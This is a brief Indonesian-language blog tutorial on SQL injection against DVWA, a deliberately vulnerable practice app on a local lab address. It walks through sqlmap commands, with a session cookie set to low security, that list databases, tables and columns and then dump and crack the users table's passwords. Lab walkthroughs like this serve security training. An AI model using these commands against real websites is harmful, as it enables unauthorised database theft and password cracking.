cara SQL Injection di website DVWA

 



http://192.168.0.2/dvwa/vulnerabilities/sqli/
masukkan angka 1 , submit



http://192.168.0.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit


lihat cookie : cookie="PHPSESSID=p5uf3em2cc5s4u9km8a6j0ms81; security=low


#1 Melihat Database
sqlmap -url="http://192.168.0.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=p5uf3em2cc5s4u9km8a6j0ms81; security=low" --dbs

#2. Melihat Tabel
sqlmap -url="http://192.168.0.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=p5uf3em2cc5s4u9km8a6j0ms81; security=low" -D dvwa --tables 

#3. Melihat kolom
sqlmap -url="http://192.168.0.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=p5uf3em2cc5s4u9km8a6j0ms81; security=low" -D dvwa -T users --columns


#4 cara dump dan Crack paswword
sqlmap -url="http://192.168.0.2/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=p5uf3em2cc5s4u9km8a6j0ms81; security=low" -D dvwa -T users --dump











Tidak ada komentar: